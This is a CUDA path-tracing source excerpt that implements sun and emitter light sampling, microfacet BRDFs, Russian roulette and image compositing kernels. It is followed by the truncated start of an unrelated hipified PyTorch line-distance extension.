ray_state[RS_LAST_BRDF_PDF] = new_brdf_pdf; old_throughput[0] = ray_state[RS_THROUGHPUT_R]; old_throughput[1] = ray_state[RS_THROUGHPUT_G]; old_throughput[2] = ray_state[RS_THROUGHPUT_B]; ray_state[RS_THROUGHPUT_R] = old_throughput[0] * brdf_color[0]; ray_state[RS_THROUGHPUT_G] = old_throughput[1] * brdf_color[1]; ray_state[RS_THROUGHPUT_B] = old_throughput[2] * brdf_color[2]; ray_state[RS_DIR_X] = d_o[0]; ray_state[RS_DIR_Y] = d_o[1]; ray_state[RS_DIR_Z] = d_o[2]; ray_state[RS_STATE] = STATE_SECONDARY; } float sun_d[3]; sun_d[0] = FLT_MAX; if (sample_sun > 0) { float theta, z; PRNG(global_id, b_seeds_1.z, theta); PRNG(global_id, b_seeds_1.w, z); theta *= TAU; z = (z * (1.0f - SUN_COS_THETA)) + SUN_COS_THETA; float z2 = sqrt(1.0f - (z * z)); float sun_ld_o[3]; sun_ld_o[0] = z2 * cos(theta); sun_ld_o[1] = z2 * sin(theta); sun_ld_o[2] = z; float sun_tangent[3]; float sun_binormal[3]; GET_BASIS(sun.direction, sun_tangent, sun_binormal); ROTATE_TO_BASIS(sun_ld_o, sun.direction, sun_tangent, sun_binormal, sun_d); sun_d[1] = fmax(0.01f, sun_d[1]); NORMALIZE(sun_d); float cos_at_tri = DOT(sun_d, n); if (cos_at_tri <= 0.0f) { sun_d[0] = FLT_MAX; } else { float sun_color[3]; float brdf_color[3]; float brdf_pdf; float sun_pdf = 1.0f / (TAU * (1.0f - SUN_COS_THETA)); float s = -6360.5f * sun_d[1]; float mu = -s * 0.00015722034f; float nu = sun_d[0] * sun.direction[0] + sun_d[1] * sun.direction[1] + sun_d[2] * sun.direction[2]; float mus = (6360.5f * sun.direction[1]) * 0.00015722034f; float rmu = 6360.5f * mu; float delta = rmu * rmu - 6360.25f; float4 cst; if ((rmu < 0.0f) && (delta > 0.0f)) { cst = make_float4(1.0f, 0.0f, 0.0f, 0.484375f); } else { cst = make_float4(-1.0f, 766800.000001f, 875.67117116f, 0.515625f); } float umu = cst.w + (rmu * cst.x + sqrt(delta + cst.y)) / (79.7511755399f + cst.z) * 0.4921875f; float umus = 0.015625f + (atan(fmax(mus, -0.1975f) * 5.34962349919f) * 0.90909090f + 0.74f) * 0.484375f; float lerp_value = (nu + 1.0f) * 3.5f; float unu = floor(lerp_value); lerp_value = lerp_value - unu; float2 uv0 = make_float2((unu + umus) * 0.125f, umu); float2 uv1 = make_float2((unu + umus + 1.0f) * 0.125f, umu); float4 raymie = fmax((tex2D<float4>(sun_table, uv0.x, uv0.y) * (1.0f - lerp_value)) + (tex2D<float4>(sun_table, uv1.x, uv1.y) * lerp_value), make_float4(0.0f)); float pr = 0.05968310365f * (1.0f + nu * nu); float pm = 0.04297183463f * pow(1.64f - 1.6f * nu, -1.5f) * (1.0f + nu * nu) * 0.378378378f; float4 beta_r = make_float4(0.0058f, 0.0135f, 0.0331f, 1.0f); float4 mie = raymie * raymie.w / NOT_ZERO(raymie.x) * (beta_r.x / beta_r); float4 sun_result = fmax(raymie * pr + mie * pm, make_float4(0.0f)) * 30.0f * sun.sky_intensity; sun_result.x *= sun.color[0]; sun_result.y *= sun.color[1]; sun_result.z *= sun.color[2]; sun.sun_intensity *= 1.0f + (sun.direction[1] * 4.0f); float horizon_falloff = fabs(sun_d[1] - 0.075f) - (sun_d[1] - 0.075f); horizon_falloff = pow(horizon_falloff, 4.0f); float hfo = horizon_falloff * 1000.0f; sun.sun_intensity *= 1.0f + (sun.direction[1] * 4.0f); float multiplier = clamp(1.0f / NOT_ZERO(hfo), 1.0f, fmax(5.0f, sun.sun_intensity * 100.0f)); sun_color[0] = sun_result.x * multiplier; sun_color[1] = sun_result.y * multiplier; sun_color[2] = sun_result.z * multiplier; float horizon_bias = fmin(0.5f, (fmax(0.0f, sun.direction[1] - 0.1f) * 10.0f)); float max_component = fmax(sun_color[0], fmax(sun_color[1], sun_color[2])); sun_color[0] = lerp(sun_color[0], max_component * 1.0f, horizon_bias); sun_color[1] = lerp(sun_color[1], max_component * 0.98f, horizon_bias); sun_color[2] = lerp(sun_color[2], max_component * 0.73f, horizon_bias); float ld_o[3]; RELATIVE_TO_BASIS(sun_d, n, n_tangent, n_binormal, ld_o); float roughness[2] = { 1.0f - smoothness, 1.0f - smoothness }; float ln_facet[3]; ln_facet[0] = ld_i[0] + ld_o[0]; ln_facet[1] = ld_i[1] + ld_o[1]; ln_facet[2] = ld_i[2] + ld_o[2]; NORMALIZE(ln_facet); float coating_dropoff = fmin(smoothness * 2.0f, 1.0f); float sample_dice; PRNG(global_id, b_seeds_2.x, sample_dice); if (glass_material || (sample_dice >= metallic)) { // Dielectric interface bool refract = glass_material && ((ld_i[2] * ld_o[2]) < 0.0f); if (refract) { // Refraction facet float ior = (ld_i[2] < 0.0f) ? (1.0f / 1.5f) : 1.5f; ln_facet[0] = ld_i[0] + ld_o[0] * ior; ln_facet[1] = ld_i[1] + ld_o[1] * ior; ln_facet[2] = ld_i[2] + ld_o[2] * ior; NORMALIZE(ln_facet); } if (ln_facet[2] < 0.0f) { ln_facet[0] *= -1.0f; ln_facet[1] *= -1.0f; ln_facet[2] *= -1.0f; } float dot_ni = DOT(ld_i, ln_facet); float d, gi, go, g; GGX_EVAL(ln_facet, roughness, d); float cos_theta_t, fresnel; DIELECTRIC_FRESNEL(dot_ni, 1.5f, cos_theta_t, fresnel); SMITH_G1(ld_i, ln_facet, roughness, gi); SMITH_G1(ld_o, ln_facet, roughness, go); g = gi * go; if (!refract) { // Reflect/transmit to diffuse. float reflect_sample; PRNG(global_id, b_seeds_2.y, reflect_sample); if (glass_material || (reflect_sample <= (fresnel * coating_dropoff))) { // Reflection if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { if ((d == 0.0f) || (ld_i[2] == 0.0f)) { sun_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } else { float model = fresnel * coating_dropoff * d * g / (4.0f * fabs(ld_i[2])); brdf_color[0] = model; brdf_color[1] = model; brdf_color[2] = model; float prob; prob = gi * fabs(dot_ni) * d / fabs(ld_i[2]); prob *= fresnel * coating_dropoff; float dwh_dwo = 1.0f / (4.0f * DOT(ld_o, ln_facet)); brdf_pdf = fabs(prob * dwh_dwo); } } else { sun_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } } else { // Transmit to diffuse brdf_color[0] = albedo[0]; brdf_color[1] = albedo[1]; brdf_color[2] = albedo[2]; brdf_pdf = INV_PI * ld_o[2]; } } else { // Refraction if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { if ((d == 0.0f) || (ld_i[2] == 0.0f)) { sun_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } else { float ior = (ld_i[2] < 0.0f) ? (1.0f / 1.5f) : 1.5f; float dot_no = DOT(ln_facet, ld_o); float sqrt_denom = dot_ni + ior * dot_no; float model = ((1.0f - fresnel) * d * g * ior * ior * dot_ni * dot_no) / (ld_i[2] * sqrt_denom * sqrt_denom); model *= (ld_i[2] < 0.0f) ? 1.5f : (1.0f / 1.5f); brdf_color[0] = albedo[0] * model; brdf_color[1] = albedo[1] * model; brdf_color[2] = albedo[2] * model; float prob; prob = gi * fabs(dot_ni) * d / fabs(ld_i[2]); prob *= fresnel * coating_dropoff; float dwh_dwo = (ior * ior * dot_no) / (sqrt_denom * sqrt_denom); brdf_pdf = fabs(prob * dwh_dwo); } } else { sun_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } } } else { // Conductor if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { float dot_ni = DOT(ln_facet, ld_i); float d, f, g, gi, go; GGX_EVAL(ln_facet, roughness, d); CONDUCTOR_FRESNEL(dot_ni, 1.5f, 3.0f, f); SMITH_G1(ld_i, ln_facet, roughness, gi); SMITH_G1(ld_o, ln_facet, roughness, go); g = gi * go; float model = f * (d * g / (4.0f * ld_i[2])); brdf_color[0] = albedo[0] * model; brdf_color[1] = albedo[1] * model; brdf_color[2] = albedo[2] * model; brdf_pdf = d * gi / (4.0f * ld_i[2]); } else { sun_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } } float mis = MIS(sun_pdf, brdf_pdf); ray_state[RS_SUN_R] = old_throughput[0] * (sun_color[0] / NOT_ZERO(sun_pdf)) * brdf_color[0] * mis; ray_state[RS_SUN_G] = old_throughput[1] * (sun_color[1] / NOT_ZERO(sun_pdf)) * brdf_color[1] * mis; ray_state[RS_SUN_B] = old_throughput[2] * (sun_color[2] / NOT_ZERO(sun_pdf)) * brdf_color[2] * mis; } } float o[3]; o[0] = ray_state[RS_ORIGIN_X]; o[1] = ray_state[RS_ORIGIN_Y]; o[2] = ray_state[RS_ORIGIN_Z]; float emitter_d[3]; emitter_d[0] = FLT_MAX; if (emitter_count > 0) { float emitter_uv_sample[2]; PRNG(global_id, b_seeds_2.z, emitter_uv_sample[0]); PRNG(global_id, b_seeds_2.w, emitter_uv_sample[1]); if ((emitter_uv_sample[0] + emitter_uv_sample[1]) >= 1.0f) { emitter_uv_sample[0] = 1.0f - emitter_uv_sample[0]; emitter_uv_sample[1] = 1.0f - emitter_uv_sample[1]; } float emit_u = emitter_uv_sample[0]; float emit_v = emitter_uv_sample[1]; float emit_w = 1.0f - emit_u - emit_v; float emitter_sample; PRNG(global_id, b_seeds_3.x, emitter_sample); uint emitter_choice = emitter_sample * emitter_count; EmitterIndex emitter_index = emitters[emitter_choice]; uint32_t emitter_tri_index = emitter_index.mesh_triangle_offset + emitter_index.triangle_offset; uint32_t tri_pixel = emitter_tri_index * 42; float emitter_position[3]; if (use_triangles_image) { emitter_position[0] = tex1Dfetch<float>(triangles_image, TRI_VERTEX) + (emit_u * tex1Dfetch<float>(triangles_image, TRI_EDGES_0)) + (emit_v * -tex1Dfetch<float>(triangles_image, TRI_EDGES_1)); emitter_position[1] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 1) + (emit_u * tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 1)) + (emit_v * -tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 1)); emitter_position[2] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 2) + (emit_u * tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 2)) + (emit_v * -tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 2)); } else { emitter_position[0] = triangles[emitter_tri_index].vertex[0] + (emit_u * triangles[emitter_tri_index].edges[0][0]) + (emit_v * -triangles[emitter_tri_index].edges[1][0]); emitter_position[1] = triangles[emitter_tri_index].vertex[1] + (emit_u * triangles[emitter_tri_index].edges[0][1]) + (emit_v * -triangles[emitter_tri_index].edges[1][1]); emitter_position[2] = triangles[emitter_tri_index].vertex[2] + (emit_u * triangles[emitter_tri_index].edges[0][2]) + (emit_v * -triangles[emitter_tri_index].edges[1][2]); } emitter_d[0] = emitter_position[0] - o[0]; emitter_d[1] = emitter_position[1] - o[1]; emitter_d[2] = emitter_position[2] - o[2]; float t_2 = DOT(emitter_d, emitter_d); float t = sqrt(t_2); ray_state[RS_EMITTER_T] = t; float inv_t = 1.0f / t; emitter_d[0] *= inv_t; emitter_d[1] *= inv_t; emitter_d[2] *= inv_t; float emitter_n[3]; float inverse_area; uint mat_id; if (use_triangles_image) { mat_id = tex1Dfetch<uint32_t>(triangles_image, TRI_MAT_ID); inverse_area = tex1Dfetch<float>(triangles_image, TRI_INV_AREA); emitter_n[0] = emit_w * tex1Dfetch<float>(triangles_image, TRI_VN_0) + emit_u * tex1Dfetch<float>(triangles_image, TRI_VN_1) + emit_v * tex1Dfetch<float>(triangles_image, TRI_VN_2); emitter_n[1] = emit_w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 1) + emit_u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 1) + emit_v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 1); emitter_n[2] = emit_w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 2) + emit_u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 2) + emit_v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 2); } else { mat_id = triangles[emitter_tri_index].material_id; inverse_area = triangles[emitter_tri_index].inverse_area; emitter_n[0] = emit_w * triangles[emitter_tri_index].vertex_normals[0][0] + emit_u * triangles[emitter_tri_index].vertex_normals[1][0] + emit_v * triangles[emitter_tri_index].vertex_normals[2][0]; emitter_n[1] = emit_w * triangles[emitter_tri_index].vertex_normals[0][1] + emit_u * triangles[emitter_tri_index].vertex_normals[1][1] + emit_v * triangles[emitter_tri_index].vertex_normals[2][1]; emitter_n[2] = emit_w * triangles[emitter_tri_index].vertex_normals[0][2] + emit_u * triangles[emitter_tri_index].vertex_normals[1][2] + emit_v * triangles[emitter_tri_index].vertex_normals[2][2]; } NORMALIZE(emitter_n); float cos_at_emitter = DOT(-emitter_d, emitter_n); float cos_at_tri = DOT(emitter_d, n); if ((cos_at_emitter <= 0.0f) || (cos_at_tri <= 0.0f) || (t_2 < (HI_EPSILON * 4.0f))) { emitter_d[0] = FLT_MAX; } else { float brdf_color[3]; float brdf_pdf; float emitter_prob = 1.0f / (float)emitter_count; float emitter_pdf = inverse_area * (t_2 / fabs(cos_at_emitter)) * emitter_prob; float intensity = materials[mat_id].emission * 25.0f; float emitter_color[3]; float uv[2]; if (materials[mat_id].map_flags & MAP_FLAG_EMISSION) { float2 emission_uv; if (use_triangles_image) { emission_uv.x = emit_w * tex1Dfetch<float>(triangles_image, TRI_UV_0) + emit_u * tex1Dfetch<float>(triangles_image, TRI_UV_1) + emit_v * tex1Dfetch<float>(triangles_image, TRI_UV_2); emission_uv.y = emit_w * tex1Dfetch<float>(triangles_image, TRI_UV_0 + 1) + emit_u * tex1Dfetch<float>(triangles_image, TRI_UV_1 + 1) + emit_v * tex1Dfetch<float>(triangles_image, TRI_UV_2 + 1); } else { emission_uv.x = emit_w * triangles[emitter_tri_index].vertex_uvs[0][0] + emit_u * triangles[emitter_tri_index].vertex_uvs[1][0] + emit_v * triangles[emitter_tri_index].vertex_uvs[2][0]; emission_uv.y = emit_w * triangles[emitter_tri_index].vertex_uvs[0][1] + emit_u * triangles[emitter_tri_index].vertex_uvs[1][1] + emit_v * triangles[emitter_tri_index].vertex_uvs[2][1]; } emission_uv.x = lerp(materials[mat_id].emission_bounds[0] + 0.5f, materials[mat_id].emission_bounds[1] - 0.5f, emission_uv.x); emission_uv.y = lerp(materials[mat_id].emission_bounds[2] + 0.5f, materials[mat_id].emission_bounds[3] - 0.5f, emission_uv.y); float4 emission_map = tex2D<float4>(emission_atlas, emission_uv.x, emission_uv.y); emitter_color[0] = emission_map.y * intensity; emitter_color[1] = emission_map.z * intensity; emitter_color[2] = emission_map.w * intensity; } else { emitter_color[0] = materials[mat_id].albedo[0] * intensity; emitter_color[1] = materials[mat_id].albedo[1] * intensity; emitter_color[2] = materials[mat_id].albedo[2] * intensity; } if (fmax(fmax(emitter_color[0], emitter_color[1]), emitter_color[2]) > 0.0f) { emitter_color[0] /= emitter_pdf; emitter_color[1] /= emitter_pdf; emitter_color[2] /= emitter_pdf; float ld_o[3]; RELATIVE_TO_BASIS(emitter_d, n, n_tangent, n_binormal, ld_o); float roughness[2] = { 1.0f - smoothness, 1.0f - smoothness }; float ln_facet[3]; ln_facet[0] = ld_i[0] + ld_o[0]; ln_facet[1] = ld_i[1] + ld_o[1]; ln_facet[2] = ld_i[2] + ld_o[2]; NORMALIZE(ln_facet); float coating_dropoff = fmin(smoothness * 2.0f, 1.0f); float sample_dice; PRNG(global_id, b_seeds_2.x, sample_dice); if (glass_material || (sample_dice >= metallic)) { // Dielectric interface bool refract = (ld_i[2] * ld_o[2]) <= 0.0f; if (refract) { // Refraction facet float ior = (ld_i[2] < 0.0f) ? (1.0f / 1.5f) : 1.5f; ln_facet[0] = ld_i[0] + ld_o[0] * ior; ln_facet[1] = ld_i[1] + ld_o[1] * ior; ln_facet[2] = ld_i[2] + ld_o[2] * ior; NORMALIZE(ln_facet); } if (ln_facet[2] < 0.0f) { ln_facet[0] *= -1.0f; ln_facet[1] *= -1.0f; ln_facet[2] *= -1.0f; } float dot_ni = DOT(ld_i, ln_facet); float d, gi, go, g; GGX_EVAL(ln_facet, roughness, d); float cos_theta_t, fresnel; DIELECTRIC_FRESNEL(dot_ni, 1.5f, cos_theta_t, fresnel); SMITH_G1(ld_i, ln_facet, roughness, gi); SMITH_G1(ld_o, ln_facet, roughness, go); g = gi * go; if (!refract) { // Reflect/transmit to diffuse. float reflect_sample; PRNG(global_id, b_seeds_2.y, reflect_sample); if (glass_material || (reflect_sample <= (fresnel * coating_dropoff))) { // Reflection if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { if ((d == 0.0f) || (ld_i[2] == 0.0f)) { emitter_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } else { float model = fresnel * coating_dropoff * d * g / (4.0f * fabs(ld_i[2])); brdf_color[0] = model; brdf_color[1] = model; brdf_color[2] = model; float prob; prob = gi * fabs(dot_ni) * d / fabs(ld_i[2]); prob *= fresnel * coating_dropoff; float dwh_dwo = 1.0f / (4.0f * DOT(ld_o, ln_facet)); brdf_pdf = fabs(prob * dwh_dwo); } } else { emitter_d[0] = FLT_MAX; } } else { // Transmit to diffuse brdf_color[0] = albedo[0]; brdf_color[1] = albedo[1]; brdf_color[2] = albedo[2]; brdf_pdf = INV_PI * ld_o[2]; } } else { // Refraction if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { if ((d == 0.0f) || (ld_i[2] == 0.0f)) { emitter_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } else { float ior = (ld_i[2] < 0.0f) ? (1.0f / 1.5f) : 1.5f; float dot_no = DOT(ln_facet, ld_o); float sqrt_denom = dot_ni + ior * dot_no; float model = ((1.0f - fresnel) * d * g * ior * ior * dot_ni * dot_no) / (ld_i[2] * sqrt_denom * sqrt_denom); model *= (ld_i[2] < 0.0f) ? 1.5f : (1.0f / 1.5f); brdf_color[0] = albedo[0] * model; brdf_color[1] = albedo[1] * model; brdf_color[2] = albedo[2] * model; float prob; prob = gi * fabs(dot_ni) * d / fabs(ld_i[2]); prob *= fresnel * coating_dropoff; float dwh_dwo = (ior * ior * dot_no) / (sqrt_denom * sqrt_denom); brdf_pdf = fabs(prob * dwh_dwo); } } else { emitter_d[0] = FLT_MAX; } } } else { // Conductor if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { float dot_ni = DOT(ln_facet, ld_i); float d, f, g, gi, go; GGX_EVAL(ln_facet, roughness, d); CONDUCTOR_FRESNEL(dot_ni, 1.5f, 3.0f, f); SMITH_G1(ld_i, ln_facet, roughness, gi); SMITH_G1(ld_o, ln_facet, roughness, go); g = gi * go; float model = f * (d * g / (4.0f * ld_i[2])); brdf_color[0] = albedo[0] * model; brdf_color[1] = albedo[1] * model; brdf_color[2] = albedo[2] * model; brdf_pdf = d * gi / (4.0f * ld_i[2]); } else { emitter_d[0] = FLT_MAX; } } } else { emitter_d[0] = FLT_MAX; } float mis = MIS(emitter_pdf, brdf_pdf); ray_state[RS_EMITTER_R] = old_throughput[0] * emitter_color[0] * brdf_color[0] * mis; ray_state[RS_EMITTER_G] = old_throughput[1] * emitter_color[1] * brdf_color[1] * mis; ray_state[RS_EMITTER_B] = old_throughput[2] * emitter_color[2] * brdf_color[2] * mis; } } ray_state[RS_SUN_D_X] = sun_d[0]; ray_state[RS_SUN_D_Y] = sun_d[1]; ray_state[RS_SUN_D_Z] = sun_d[2]; ray_state[RS_EMITTER_D_X] = emitter_d[0]; ray_state[RS_EMITTER_D_Y] = emitter_d[1]; ray_state[RS_EMITTER_D_Z] = emitter_d[2]; } /// __global__ void NEE(float* ray_state, Material* materials, int32_t use_nodes_image, cudaTextureObject_t nodes_image, TwoNode* nodes, int32_t top_tree_offset, int32_t use_triangles_image, cudaTextureObject_t triangles_image, TreeTriangle* triangles, cudaTextureObject_t albedo_atlas, cudaTextureObject_t emission_atlas, uint4 b_seeds, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int state = ray_state[RS_STATE]; if (state == STATE_END) { return; } float o[3]; o[0] = ray_state[RS_ORIGIN_X]; o[1] = ray_state[RS_ORIGIN_Y]; o[2] = ray_state[RS_ORIGIN_Z]; float sun_d[3]; sun_d[0] = ray_state[RS_SUN_D_X]; if (sun_d[0] < FLT_MAX) { sun_d[1] = ray_state[RS_SUN_D_Y]; sun_d[2] = ray_state[RS_SUN_D_Z]; float sun_o[3]; sun_o[0] = o[0] + (sun_d[0] * EPSILON); sun_o[1] = o[1] + (sun_d[1] * EPSILON); sun_o[2] = o[2] + (sun_d[2] * EPSILON); float h_t = FLT_MAX; OCCLUSION(sun_o, sun_d, use_nodes_image, use_triangles_image); if (h_t == FLT_MAX) { ray_state[RS_COLOR_R] += ray_state[RS_SUN_R]; ray_state[RS_COLOR_G] += ray_state[RS_SUN_G]; ray_state[RS_COLOR_B] += ray_state[RS_SUN_B]; } } float emitter_d[3]; emitter_d[0] = ray_state[RS_EMITTER_D_X]; if (emitter_d[0] < FLT_MAX) { emitter_d[1] = ray_state[RS_EMITTER_D_Y]; emitter_d[2] = ray_state[RS_EMITTER_D_Z]; float emitter_o[3]; emitter_o[0] = o[0] + (emitter_d[0] * EPSILON); emitter_o[1] = o[1] + (emitter_d[1] * EPSILON); emitter_o[2] = o[2] + (emitter_d[2] * EPSILON); float emitter_t = ray_state[RS_EMITTER_T] - (2.0f * EPSILON); float h_t = emitter_t; OCCLUSION(emitter_o, emitter_d, use_nodes_image, use_triangles_image); if (h_t == emitter_t) { ray_state[RS_COLOR_R] += ray_state[RS_EMITTER_R]; ray_state[RS_COLOR_G] += ray_state[RS_EMITTER_G]; ray_state[RS_COLOR_B] += ray_state[RS_EMITTER_B]; } } float throughput[3]; throughput[0] = ray_state[RS_THROUGHPUT_R]; throughput[1] = ray_state[RS_THROUGHPUT_G]; throughput[2] = ray_state[RS_THROUGHPUT_B]; float tp = fmax(fmax(throughput[0], throughput[1]), throughput[2]); if (tp <= THROUGHPUT_THRESHOLD) { ray_state[RS_STATE] = STATE_END; } else { float roulette_prob = tp; if (roulette_prob <= 1.0f) { float roulette; PRNG(global_id, b_seeds.z, roulette); if (roulette < roulette_prob) { float modify_throughput = 1.0f / roulette_prob; ray_state[RS_THROUGHPUT_R] = throughput[0] * modify_throughput; ray_state[RS_THROUGHPUT_G] = throughput[1] * modify_throughput; ray_state[RS_THROUGHPUT_B] = throughput[2] * modify_throughput; } else { ray_state[RS_STATE] = STATE_END; } } } } /// __global__ void Accumulate(float* ray_state, cudaSurfaceObject_t target, ImageProperties image_properties, int32_t width, int32_t height, float inv_sample_count) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } float rgb[3]; rgb[0] = ray_state[RS_COLOR_R]; rgb[1] = ray_state[RS_COLOR_G]; rgb[2] = ray_state[RS_COLOR_B]; AVG_TONEMAP(rgb); float lum_coeff[3]; lum_coeff[0] = 0.2125f; lum_coeff[1] = 0.7154f; lum_coeff[2] = 0.0721f; float bright_rgb[3]; bright_rgb[0] = rgb[0] * image_properties.brightness; bright_rgb[1] = rgb[1] * image_properties.brightness; bright_rgb[2] = rgb[2] * image_properties.brightness; float intensity = DOT(bright_rgb, lum_coeff); float sat_color[3]; sat_color[0] = lerp(intensity, bright_rgb[0], image_properties.saturation); sat_color[1] = lerp(intensity, bright_rgb[1], image_properties.saturation); sat_color[2] = lerp(intensity, bright_rgb[2], image_properties.saturation); rgb[0] = lerp(0.5f, sat_color[0], image_properties.contrast); rgb[1] = lerp(0.5f, sat_color[1], image_properties.contrast); rgb[2] = lerp(0.5f, sat_color[2], image_properties.contrast); uchar4 target_color = make_uchar4(saturate(rgb[0]) * 255.0f, saturate(rgb[1]) * 255.0f, saturate(rgb[2]) * 255.0f, 255); int32_t x = global_id % width; int32_t y = global_id / width; surf2Dwrite(target_color, target, x * sizeof(uchar4), y, cudaBoundaryModeClamp); } /// __global__ void CompositeTwo(cudaSurfaceObject_t compositing_target_one, cudaTextureObject_t compositing_target_two, cudaSurfaceObject_t target, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t x = global_id % width; int32_t y = global_id / width; uint4 c0 = make_uint4(surf2Dread<uchar4>(compositing_target_one, x * sizeof(uchar4), y, cudaBoundaryModeClamp)); uint4 c1 = make_uint4(tex2D<uchar4>(compositing_target_two, x, y)); uint4 color = (c0 + c1) / make_uint4(2); uchar4 target_color = make_uchar4(color, 255); surf2Dwrite(target_color, target, x * sizeof(uchar4), y, cudaBoundaryModeClamp); } /// __global__ void CompositeThree(cudaSurfaceObject_t compositing_target_one, cudaTextureObject_t compositing_target_two, cudaTextureObject_t compositing_target_three, cudaSurfaceObject_t target, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t x = global_id % width; int32_t y = global_id / width; uint4 c0 = make_uint4(surf2Dread<uchar4>(compositing_target_one, x * sizeof(uchar4), y, cudaBoundaryModeClamp)); uint4 c1 = make_uint4(tex2D<uchar4>(compositing_target_two, x, y)); uint4 c2 = make_uint4(tex2D<uchar4>(compositing_target_three, x, y)); uint4 color = (c0 + c1 + c2) / make_uint4(3); uchar4 target_color = make_uchar4(color, 255); surf2Dwrite(target_color, target, x * sizeof(uchar4), y, cudaBoundaryModeClamp); } /// __global__ void CompositeFour(cudaSurfaceObject_t compositing_target_one, cudaTextureObject_t compositing_target_two, cudaTextureObject_t compositing_target_three, cudaTextureObject_t compositing_target_four, cudaSurfaceObject_t target, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t x = global_id % width; int32_t y = global_id / width; uint4 c0 = make_uint4(surf2Dread<uchar4>(compositing_target_one, x * sizeof(uchar4), y, cudaBoundaryModeClamp)); uint4 c1 = make_uint4(tex2D<uchar4>(compositing_target_two, x, y)); uint4 c2 = make_uint4(tex2D<uchar4>(compositing_target_three, x, y)); uint4 c3 = make_uint4(tex2D<uchar4>(compositing_target_four, x, y)); uint4 color = (c0 + c1 + c2 + c3) / make_uint4(4); uchar4 target_color = make_uchar4(color, 255); surf2Dwrite(target_color, target, x * sizeof(uchar4), y, cudaBoundaryModeClamp); } /// __global__ void CompositeFive(cudaSurfaceObject_t compositing_target_one, cudaTextureObject_t compositing_target_two, cudaTextureObject_t compositing_target_three, cudaTextureObject_t compositing_target_four, cudaTextureObject_t compositing_target_five, cudaSurfaceObject_t target, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t x = global_id % width; int32_t y = global_id / width; uint4 c0 = make_uint4(surf2Dread<uchar4>(compositing_target_one, x * sizeof(uchar4), y, cudaBoundaryModeClamp)); uint4 c1 = make_uint4(tex2D<uchar4>(compositing_target_two, x, y)); uint4 c2 = make_uint4(tex2D<uchar4>(compositing_target_three, x, y)); uint4 c3 = make_uint4(tex2D<uchar4>(compositing_target_four, x, y)); uint4 c4 = make_uint4(tex2D<uchar4>(compositing_target_five, x, y)); uint4 color = (c0 + c1 + c2 + c3 + c4) / make_uint4(5); uchar4 target_color = make_uchar4(color, 255); surf2Dwrite(target_color, target, x * sizeof(uchar4), y, cudaBoundaryModeClamp); } }
95d164da8469151c12074541f08d60ecdebe4aed.hip
// !!! This is a file automatically generated by hipify!!! #include <ATen/ATen.h> #include <hip/hip_runtime.h> #include <hip/hip_runtime.h> #include <assert.h> #include <THH/THH.h> #include <vector> #include <torch/torch.h> #include <torch/extension.h> #define eps 1e-10 #define SCALE 1.0 #define MAX_DIS 9999999999.0 //extern THCState * state; template<typename scalar_t> __host__ __device__ scalar_t line_variance_topk_cuda_abs(scalar_t a){ if (a > 0.0){ return a; } else{ return -a; } } template<typename scalar_t> __host__ __device__ scalar_t line_variance_topk_cuda_square(scalar_t a){ return a * a; } template<typename scalar_t> __host__ __device__ scalar_t line_variance_topk_cuda_divide_non_zero(scalar_t a){ if (a == 0){ return eps; } if (a < 0){ return a - eps; } if (a > 0){ return a + eps; } return eps; } template<typename scalar_t> __host__ __device__ scalar_t line_variance_topk_cuda_min_dis(scalar_t a, scalar_t b, scalar_t c){ scalar_t min_d = a; if (b < min_d){ min_d = b; } if (c < min_d){ min_d = c; } return min_d; } template<typename scalar_t> __host__ __device__ scalar_t line_variance_topk_cuda_min_dis_idx(scalar_t a, scalar_t b, scalar_t c){ scalar_t min_d = a; int min_idx = 0; if (b < min_d){ min_d = b; min_idx = 1; } if (c < min_d){ min_d = c; min_idx = 2; } return min_idx; } template <typename scalar_t> __host__ __device__ scalar_t distance_line(scalar_t x1, scalar_t y1, scalar_t x2, scalar_t y2, scalar_t x, scalar_t y){ scalar_t dx1x2 = -x1 + x2; scalar_t dy1y2 = -y1 + y2; scalar_t dx1x = x - x1; scalar_t dy1y = y - y1; scalar_t c1 = - x * x1 + x * x2 + x1 * x1 - x1 * x2 - y * y1 + y * y2 + y1 * y1 - y1 * y2; scalar_t c2 = x1 * x1 - 2 * x1 * x2 + x2 * x2 + y1 * y1 - 2 * y1 * y2 + y2 * y2; scalar_t d1 = -dx1x + dx1x2 * c1 / line_variance_topk_cuda_divide_non_zero(c2); scalar_t d2 = -dy1y + dy1y2 * c1 / line_variance_topk_cuda_divide_non_zero(c2); scalar_t dis = 